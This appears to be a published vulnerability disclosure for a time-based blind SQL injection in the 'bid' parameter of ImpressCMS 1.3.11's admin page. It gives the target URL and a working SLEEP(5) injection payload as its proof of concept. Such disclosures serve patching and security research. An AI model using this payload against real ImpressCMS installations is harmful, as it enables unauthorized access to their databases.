# Title: ImpressCMS 1.3.11 - 'bid' SQL Injection # Date: 21.01.2019 # Exploit Author: Mehmet Onder Key # Vendor Homepage: http://www.impresscms.org/ # Software Link: https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip # Version: v1.3.11 # Category: Webapps # Tested on: WAMPP @Win # Software description: ImpressCMS is a community developed Content Management System. With this tool maintaining the content of a website becomes as easy as writing a word document. ImpressCMS is the ideal tool for a wide range of users: from business to community users, from large enterprises to people who want a simple, easy to use blogging tool. # Vulnerabilities: # An attacker can access all data following an un/authorized user login using the parameter. # POC - SQLi : # Parameter: bid (POST) # Request URL: http://localhost/impress/modules/system/admin.php?bid=12 # Type : time-based blind bid=12') AND SLEEP(5) AND ('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==